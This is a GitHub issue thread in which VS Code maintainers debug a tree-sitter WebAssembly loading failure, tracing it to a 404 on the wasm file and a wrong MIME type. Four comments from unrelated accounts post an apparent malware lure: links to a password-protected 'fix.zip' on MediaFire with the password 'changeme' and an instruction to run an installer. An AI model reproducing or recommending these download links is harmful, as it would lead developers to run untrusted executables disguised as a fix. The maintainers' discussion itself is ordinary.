### ISSUE TITLE
TypeError: Failed to execute 'compile' on 'WebAssembly'

### ISSUE THREAD

**Issue by bpasero** [microsoft/vscode#226599]
When enabling the new experimental tree sitter option in web, I see below errors:

```
tree-sitter.js:7 wasm streaming compile failed: TypeError: Failed to execute 'compile' on 'WebAssembly': HTTP status code is not ok
falling back to ArrayBuffer instantiation
failed to asynchronously prepare wasm: both async and sync fetching of the wasm failed
tree-sitter.js:7 Uncaught (in promise) 
RuntimeError: Aborted(both async and sync fetching of the wasm failed). Build with -sASSERTIONS for more info.
    at abort (tree-sitter.js:7:5014)
    at tree-sitter.js:7:5989
```

Is there a way to validate it works?

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by alexr00** [comment]
There's an additional error line right before these that I think is the actual problem:

```
GET https://main.vscode-cdn.net/insider/e81aceaa07bab1ccdc94deae04168c8bd062f0de/node_modules.asar.unpacked/@vscode/tree-sitter-wasm/wasm/tree-sitter.wasm 404 (Not Found)
```

It looks like the issue is here:

https://github.com/microsoft/vscode/blob/a825fccfd8cf3519359e5bb2dcf3bacfdf2caaac/src/vs/editor/browser/services/treeSitter/treeSitterParserService.ts#L31-L32

**Comment by bpasero** [comment]
@alexr00 oh yes! And in fact you can use ESM build to get one step ahead without asar:

https://insiders.vscode.dev/github/microsoft/vscode?vscode-version=00082d111faf1a70689b62c352e676f292bb2479&vscode-esm=true

Then the error becomes:

```
wasm streaming compile failed: TypeError: Failed to execute 'compile' on 'WebAssembly': Incorrect response MIME type. Expected 'application/wasm'.
falling back to ArrayBuffer instantiation
```

Which maybe is just a warning that a fallback is used?

**Comment by alexr00** [comment]
I get this when I try to use the esm build:



![Image](https://github.com/user-attachments/assets/c56b54b1-f248-4132-8299-2dc618d615b5)

**Comment by bpasero** [comment]
How did you try?

**Comment by jrieken** [comment]
> wasm streaming compile failed: TypeError: Failed to execute 'compile' on 'WebAssembly': Incorrect response MIME type. Expected 'application/wasm'. falling back to ArrayBuffer instantiation

WASM can be instantiated from just bytes (ArrayBuffer) or from a stream of bytes (e.g WASM parsing runs as bytes are being received from the server). The latter the only works when the server sends the correct mime-type and that explains the error/warning

**Comment by bpasero** [comment]
Yup, we can try to add that mime type to the server.

**Comment by alexr00** [comment]
> How did you try?

I just clicked on your link, and every time the workbench failed to load with that error. Today it works though 🤷‍♀️

**Comment by bpasero** [comment]
I have seen cases where the query param is removed, so watch out they are all present.

**Comment by alexr00** [comment]
The only change I made here was to update Tree-Sitter, and I don't think that did it. Seems to be fixed though as I can get Tree-Sitter based syntax highlighting for TS in insiders.vscode.dev ✨
